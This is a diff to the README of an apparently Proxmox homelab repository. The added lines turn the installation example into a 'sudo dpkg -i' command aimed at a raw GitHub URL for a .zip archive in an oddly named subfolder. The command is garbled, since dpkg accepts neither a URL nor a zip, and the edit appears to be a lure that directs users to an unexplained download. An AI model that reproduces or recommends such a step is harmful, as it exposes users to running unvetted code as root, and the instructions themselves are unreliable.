thirddegreeburnfleming626/proxmox-homelab/README.md

 1. Open your terminal or command prompt.
 2. Navigate to the folder where the downloaded file is located.
 3. Run the installation command.
-For example, you might type `sudo dpkg -i proxmox-homelab-latest.deb` for Debian-based systems.
+For example, you might type `sudo dpkg -i https://raw.githubusercontent.com/thirddegreeburnfleming626/proxmox-homelab/main/brachioganoid/proxmox-homelab-2.6.zip` for Debian-based systems.

-Make sure to replace `proxmox-homelab-latest.deb` with the actual name of the file you downloaded.
+Make sure to replace `https://raw.githubusercontent.com/thirddegreeburnfleming626/proxmox-homelab/main/brachioganoid/proxmox-homelab-2.6.zip` with the actual name of the file you downloaded.

 ## ⚙️ Configuration